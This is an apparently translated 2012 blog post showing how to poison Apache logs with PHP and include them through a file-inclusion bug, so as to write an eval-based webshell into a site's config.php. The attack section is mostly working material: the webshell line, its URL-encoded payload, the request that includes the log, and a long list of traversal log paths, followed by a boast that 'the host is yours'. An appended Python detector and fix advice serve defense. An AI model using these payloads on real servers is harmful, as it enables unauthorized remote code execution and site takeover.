
Writing a webshell by including Apache logs in PHP

Posted on 2012-9-15 14:27:40
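The method above is not very practical: in my testing I found that the logs easily run to tens of megabytes, which makes it no fun to work with. Going a step further, the idea below is to write a properly usable webshell, which is also much better than the painfully slow approach above.

For example, take the same one-line trojan again:
<?eval($_POST[cmd]);?>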

By now you may have realized that this is a pretty good approach. Next, the question becomes how to write it. Use this:
fopen opens the file /home/virtual/www.xxx.com/forum/config.php and then writes the one-line trojan server-side statement <?eval($_POST[cmd]);?> into it. Put together as a PHP statement, that is:

<?$fp=fopen("/home/virtual/www.xxx.com/forum/config.php","w+");fputs($fp,"<?eval($_POST[cmd]);?>");
fclose($fp);?>   // writes the one-line trojan statement into config.php

We submit this statement so that Apache records it in the error log, then include the log, and the shell is written. Remember that it must be converted to URL-encoded form for this to succeed.
Converted, it becomes:
%3C%3F%24fp%3Dfopen%28%22%2Fhome%2Fvirtual%2Fwww%2Exxx%2Ecom%2Fforum%2F
config%2Ephp%22%2C%22w%2B%22%29%3Bfputs%28%24fp
%2C%22%3C%3Feval%28%24%5FPOST%5Bcmd%5D%29%3B%3F%3E%22%29%3B
fclose%28%24fp%29%3B%3F%3E
We submit:
http://xxx.com/%3C%3F%24fp%3Dfopen%28%22%2Fhome%2Fvirtual%2Fwww
%2Exxx%2Ecom%2Fforum%2Fconfig%2Ephp
%22%2C%22w%2B%22%29%3Bfputs%28%24fp%2C%22%3C%3Feval%28%24%5FPOST%5B
cmd%5D%29%3B%3F%3E%22%29%3Bfclose%28%24fp%29%3B%3F%3E

This way the error log records this line of webshell-writing code.
Then we include the log by submitting:
http://xxx.com/z.php?zizzy=/home ... /logs/www-error_log

The webshell is now written: the one-line trojan statement has been written into config.php.
OK.
http://www.xxx.com/forum/config.php has now become our webshell.
Connect directly with lanker's client and the host is yours.

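PS: Everything above presupposes that the folder is writable; it must be -rwxrwxrwx (777) to continue. Here, simply use the directory listed above to check. Everything above describes exploitation when the log path is known.

For other log paths, you can guess, or refer to the list here.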
../../../../../../../../../../var/log/httpd/access_log
../../../../../../../../../../var/log/httpd/error_log
../apache/logs/error.log
../apache/logs/access.log
../../apache/logs/error.log
../../apache/logs/access.log
../../../apache/logs/error.log
../../../apache/logs/access.log
../../../../../../../../../../etc/httpd/logs/acces_log
../../../../../../../../../../etc/httpd/logs/acces.log
../../../../../../../../../../etc/httpd/logs/error_log
../../../../../../../../../../etc/httpd/logs/error.log
../../../../../../../../../../var/www/logs/access_log
../../../../../../../../../../var/www/logs/access.log
../../../../../../../../../../usr/local/apache/logs/access_log
../../../../../../../../../../usr/local/apache/logs/access.log
../../../../../../../../../../var/log/apache/access_log
../../../../../../../../../../var/log/apache/access.log
../../../../../../../../../../var/log/access_log
../../../../../../../../../../var/www/logs/error_log
../../../../../../../../../../var/www/logs/error.log
../../../../../../../../../../usr/local/apache/logs/error_log
../../../../../../../../../../usr/local/apache/logs/error.log
../../../../../../../../../../var/log/apache/error_log
../../../../../../../../../../var/log/apache/error.log
../../../../../../../../../../var/log/error_log
/var/log/httpd/access_log
/var/log/httpd/error_log
/etc/httpd/logs/acces_log
/etc/httpd/logs/acces.log
/etc/httpd/logs/error_log
/etc/httpd/logs/error.log
/var/www/logs/access_log
/var/www/logs/access.log
/usr/local/apache/logs/access_log
/usr/local/apache/logs/access.log
/var/log/apache/access_log
/var/log/apache/access.log
/var/log/access_log
/var/www/logs/error_log
/var/www/logs/error.log
/usr/local/apache/logs/error_log
/usr/local/apache/logs/error.log
/var/log/apache/error_log
/var/log/apache/error.log
/var/log/error_log
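
The two requests this post relies on (PHP code in a request path, then an include parameter pointing at a log file) are both visible in the logs themselves. The following detection sketch is an added example, not part of the original post; the sample log lines are constructed, and the function names and the Apache 2.2 "File does not exist" error-log wording are assumptions.

```python
import re
from urllib.parse import unquote

# PHP open tag, or the functions the post's payload uses, seen after URL-decoding.
PHP_MARKERS = re.compile(r"<\?|\b(?:eval|fopen|fputs|fwrite)\s*\(", re.I)
# A query parameter whose value names an access/error log file.
LOG_INCLUDE = re.compile(r"[?&][^=&\s]+=[^&\s]*(?:access|error)[._]log", re.I)
REQUEST = re.compile(r'"(?:GET|POST|HEAD) (\S+)')        # access log request line
NOT_FOUND = re.compile(r"File does not exist: (\S+)")    # assumed error-log wording

def decode(value, rounds=3):
    """URL-decode repeatedly so double-encoded input is also normalised."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def classify(line):
    """Return the list of findings for one log line (empty if clean)."""
    m = REQUEST.search(line) or NOT_FOUND.search(line)
    target = decode(m.group(1) if m else line)
    findings = []
    if PHP_MARKERS.search(target):
        findings.append("php-code-in-request")
    if LOG_INCLUDE.search(target):
        findings.append("log-file-in-parameter")
    return findings

def scan(lines):
    """Map 1-based line number -> findings, for flagged lines only."""
    return {n: f for n, line in enumerate(lines, 1) if (f := classify(line))}

# Constructed sample log lines (not taken from a real server).
SAMPLE = [
    '198.51.100.7 - - [15/Sep/2012:14:19:58 +0800] "GET /forum/index.php?page=2 HTTP/1.1" 200 1834',
    '203.0.113.5 - - [15/Sep/2012:14:20:01 +0800] "GET /%3C%3Feval%28%24%5FPOST%5Bcmd%5D%29%3B%3F%3E HTTP/1.1" 404 210',
    '[Sat Sep 15 14:20:01 2012] [error] [client 203.0.113.5] File does not exist: /var/www/<?eval($_POST[cmd]);?>',
    '203.0.113.5 - - [15/Sep/2012:14:20:09 +0800] "GET /z.php?zizzy=../../../var/log/httpd/error_log HTTP/1.1" 200 5120',
]

if __name__ == "__main__":
    for n, findings in scan(SAMPLE).items():
        print(n, findings)
```

The durable fix is on the application side: map the include parameter to a fixed allowlist of files, and keep web-server logs and the web root unwritable and unreadable to the PHP process wherever possible.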